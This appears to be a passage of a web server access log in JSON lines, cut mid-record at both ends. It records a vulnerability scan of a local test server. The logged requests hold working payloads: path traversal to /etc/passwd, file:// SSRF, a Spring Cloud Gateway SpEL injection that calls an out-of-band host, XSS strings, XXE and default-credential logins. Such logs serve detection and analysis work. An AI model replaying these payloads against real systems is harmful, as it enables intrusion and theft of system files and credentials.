x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"name=Admin&password=zabbix&autologin=1&enter=Sign+in","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /device.rsp?opt=user&cmd=list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conn.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/29KD1yjg1nEu4b3qS9RvfFYOSWm], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x2229KD1yjg1nEu4b3qS9RvfFYOSWm\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22ca28fg0smpvbd3qg07h0ec384w68fuwwh.oast.live\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anything_here HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/sling/loginstatus.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.185","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:55 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 